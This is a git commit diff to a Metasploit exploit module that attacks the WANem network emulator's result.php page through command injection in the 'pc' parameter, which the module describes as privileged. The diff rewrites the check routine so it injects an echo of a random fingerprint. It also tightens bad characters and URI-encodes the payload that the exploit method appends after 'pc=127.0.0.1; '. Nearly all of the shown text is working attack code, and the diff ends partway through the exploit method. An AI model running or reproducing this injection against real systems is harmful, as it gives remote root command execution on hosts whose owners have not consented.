check function test vulnerability + minor improvements

unstable
jvazquez-r7 2012-09-09 00:42:02 +02:00
parent f02659184a
commit 37c7f366f2
1 changed files with 21 additions and 11 deletions


@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote
and vulnerable to command execution in argument one.
},
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
@ -42,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'BadChars' => "\x00\x22\x27",
'DisableNops' => true,
'Compat' =>
{
@ -68,24 +67,35 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode("echo #{fingerprint}")
data << "%26"
print_status("#{@peer} - Sending check")
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => '/WANem/result.php'
})
if res and res.body =~ /<br><br><br><b><font color=red>Can't measure\!\! Please repeat\.<\/font><\/b><\/body>/
return Exploit::CheckCode::Appears
'uri' => '/WANem/result.php',
'method' => 'POST',
'data' => data
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
if res and res.code == 200 and res.body =~ /#{fingerprint}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
@peer = "#{rhost}:#{rport}"
data = "pc=127.0.0.1; "
data << URI.encode(payload.raw)
data << Rex::Text.uri_encode(payload.raw)
data << "%26"
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
begin